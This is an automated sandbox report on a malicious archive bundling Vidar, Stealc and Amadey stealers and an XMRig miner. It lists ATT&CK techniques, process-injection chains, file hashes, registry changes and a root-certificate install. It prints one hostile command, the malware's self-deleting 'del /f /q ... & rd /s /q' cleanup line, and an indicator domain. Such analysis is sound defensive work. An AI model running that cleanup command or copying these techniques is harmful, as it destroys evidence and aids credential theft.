Malware Analysis Report

2024-09-11 16:25

Sample ID 240619-q57f9s1fqd
Target 2x.rar
SHA256 fb389983ad7ef0623d3318ca5e7aa2b484692affa283929504133f825329ea4e
Tags
stealc vidar stealer discovery spyware amadey xmrig ffb1b9 miner trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fb389983ad7ef0623d3318ca5e7aa2b484692affa283929504133f825329ea4e

Threat Level: Known bad

The file 2x.rar was found to be: Known bad.

Malicious Activity Summary

stealc vidar stealer discovery spyware amadey xmrig ffb1b9 miner trojan upx

Vidar

Stealc

xmrig

Detect Vidar Stealer

Amadey

XMRig Miner payload

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

UPX packed file

Reads data files stored by FTP clients

Reads user/profile data of local email clients

Accesses cryptocurrency files/wallets, possible credential harvesting

Downloads MZ/PE file

Checks installed software on the system

Suspicious use of SetThreadContext

Checks computer location settings

Drops file in Windows directory

Checks installed software on the system

Executes dropped EXE

Loads dropped DLL

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Delays execution with timeout.exe

Modifies system certificate store

Checks processor information in registry

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Modify Registry
T1112
Subvert Trust Controls
T1553
Install Root Certificate
T1553.004
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-19 13:51

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-19 13:51

Reported

2024-06-19 13:54

Platform

win7-20240221-en

Max time kernel

149s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 552 set thread context of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\CUF.au3

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 552 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 552 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 552 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 552 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 552 wrote to memory of 1804 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1804 wrote to memory of 2668 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2668 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2668 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 148

Network

N/A

Files

memory/552-0-0x00000000747D0000-0x0000000074944000-memory.dmp

memory/552-1-0x0000000077440000-0x00000000775E9000-memory.dmp

memory/552-5-0x00000000747E2000-0x00000000747E4000-memory.dmp

memory/552-6-0x00000000747D0000-0x0000000074944000-memory.dmp

memory/552-7-0x00000000747D0000-0x0000000074944000-memory.dmp

memory/1804-9-0x00000000747D0000-0x0000000074944000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a5b55250

MD5 48ad699bc6551b8e51533f738e9256f8
SHA1 dc5eb55dfc1edc4debacb83be9d0eb714c589127
SHA256 ed0a9f365d605657341d56e3dc027bacf4b5a48ff55f7faa654d2d9feb2eb5ac
SHA512 745c357fc2c259551d3719785e01588714fe096726eed5a0235e3cf2e9f7d561b8417fbf49951d0f684373e3c96f3f88664ca5af80d80e8a72a63be55dfd5f8e

memory/1804-11-0x0000000077440000-0x00000000775E9000-memory.dmp

memory/1804-13-0x00000000747D0000-0x0000000074944000-memory.dmp

\Users\Admin\AppData\Local\Temp\CUF.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/1804-17-0x00000000747D0000-0x0000000074944000-memory.dmp

memory/2668-20-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2668-19-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1804-21-0x00000000747D0000-0x0000000074944000-memory.dmp

memory/2668-23-0x0000000000610000-0x0000000000D5C000-memory.dmp

memory/2668-30-0x0000000000610000-0x0000000000D5C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-19 13:51

Reported

2024-06-19 13:54

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Reads data files stored by FTP clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3296 set thread context of 1444 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3296 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3296 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3296 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3296 wrote to memory of 1444 N/A C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 1444 wrote to memory of 2204 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1444 wrote to memory of 2204 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1444 wrote to memory of 2204 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1444 wrote to memory of 2204 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 1444 wrote to memory of 2204 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2204 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 2204 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\cmd.exe
PID 4856 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4856 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4856 wrote to memory of 3168 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\6a136a7426b8770d8664cc9e508c093bf597231738e853f21e597dac99534bf3\files\Setup.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\CUF.au3" & rd /s /q "C:\ProgramData\GIEHIDHJDBFI" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

Network

Country Destination Domain Proto
US 8.8.8.8:53 poocoin.online udp

Files

memory/3296-0-0x0000000074340000-0x00000000744BB000-memory.dmp

memory/3296-1-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

memory/3296-5-0x0000000074352000-0x0000000074354000-memory.dmp

memory/3296-6-0x0000000074340000-0x00000000744BB000-memory.dmp

memory/3296-7-0x0000000074340000-0x00000000744BB000-memory.dmp

memory/1444-9-0x0000000074340000-0x00000000744BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9d05c55c

MD5 b571650d09720c15451b1775b9c5e455
SHA1 4617a0fe8bd4f99ec3be9e67494d91d3b5276791
SHA256 6a18431ba53fd8557b2b15fec5e964745e78eb04c3fc81284f93ad0eb66611a1
SHA512 d0103f0158bcc8e22bf13909420ce10f0ad86e88f59788392ddd45346a67c7d869b07c82fc0e56bc459f41ff426eee7163c8fc696a6aedd6189961b7cc557239

memory/1444-11-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

memory/1444-13-0x0000000074340000-0x00000000744BB000-memory.dmp

memory/1444-14-0x0000000074340000-0x00000000744BB000-memory.dmp

memory/1444-19-0x0000000074340000-0x00000000744BB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CUF.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2204-21-0x0000000001600000-0x0000000001D4C000-memory.dmp

memory/2204-23-0x00007FFF07FD0000-0x00007FFF081C5000-memory.dmp

memory/2204-24-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2204-42-0x0000000001600000-0x0000000001D4C000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-19 13:51

Reported

2024-06-19 13:54

Platform

win7-20240508-en

Max time kernel

149s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\CUF.au3

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\more.com N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3068 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3068 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3068 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3068 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 3068 wrote to memory of 2432 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2432 wrote to memory of 2740 N/A C:\Windows\SysWOW64\more.com C:\Users\Admin\AppData\Local\Temp\CUF.au3
PID 2740 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2740 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2740 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2740 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe"

C:\Windows\SysWOW64\more.com

C:\Windows\SysWOW64\more.com

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Users\Admin\AppData\Local\Temp\CUF.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 148

Network

N/A

Files

memory/3068-0-0x0000000000220000-0x0000000000221000-memory.dmp

memory/3068-1-0x0000000077A30000-0x0000000077BD9000-memory.dmp

memory/3068-10-0x0000000073F62000-0x0000000073F64000-memory.dmp

memory/3068-11-0x0000000073F51000-0x0000000073F63000-memory.dmp

memory/3068-13-0x0000000073F51000-0x0000000073F63000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\bd1f30c2

MD5 49946e5cd8e012b919f328d5fc30a1cd
SHA1 2d39ade2b209b724a8a0e0bb264d6fe7eb9d5902
SHA256 e63abecedb6704381f8948e74934f64ca17dc1cbf286d74dc4a366aa554b09a3
SHA512 46dba9b7ad7427630e825b3dc564ccf092ddb6ebbdd8c94f1056c390aba444f90c5ce87d10d35cc85e0a0f416df4929a02429da8c9643b9be5b7bbae53edb7e4

memory/2432-14-0x0000000073F50000-0x00000000740C4000-memory.dmp

memory/2432-16-0x0000000077A30000-0x0000000077BD9000-memory.dmp

memory/2432-18-0x0000000073F50000-0x00000000740C4000-memory.dmp

memory/2432-21-0x0000000073F50000-0x00000000740C4000-memory.dmp

\Users\Admin\AppData\Local\Temp\CUF.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2740-25-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2740-24-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2432-26-0x0000000073F50000-0x00000000740C4000-memory.dmp

memory/2740-28-0x0000000000690000-0x0000000000DDB000-memory.dmp

memory/2740-35-0x0000000000690000-0x0000000000DDB000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-19 13:51

Reported

2024-06-19 13:54

Platform

win10v2004-20240611-en

Max time kernel

145s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe"

Signatures

Amadey

trojan amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 5108 set thread context of 540 N/A C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe C:\Windows\SysWOW64\more.com
PID 4060 set thread context of 936 N/A C:\ProgramData\IIJDBAKKKF.exe C:\Windows\SysWOW64\ftp.exe
PID 2052 set thread context of 4544 N/A C:\ProgramData\ECGHCBGCBF.exe C:\Windows\SysWOW64\ftp.exe
PID 4544 set thread context of 948 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 948 set thread context of 1392 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Checks installed software on the system

discovery

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Watcher Com SH.job C:\Windows\SysWOW64\ftp.exe N/A
File created C:\Windows\Tasks\TWI Cloud Host.job C:\Windows\SysWOW64\ftp.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\IIJDBAKKKF.exe N/A
N/A N/A C:\ProgramData\ECGHCBGCBF.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\b7fd8320d8c4c416bd3f033cd7e823c71866f07c965806bbaba5699a0bbaa49e\files\Setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\CUF.au3 N/A
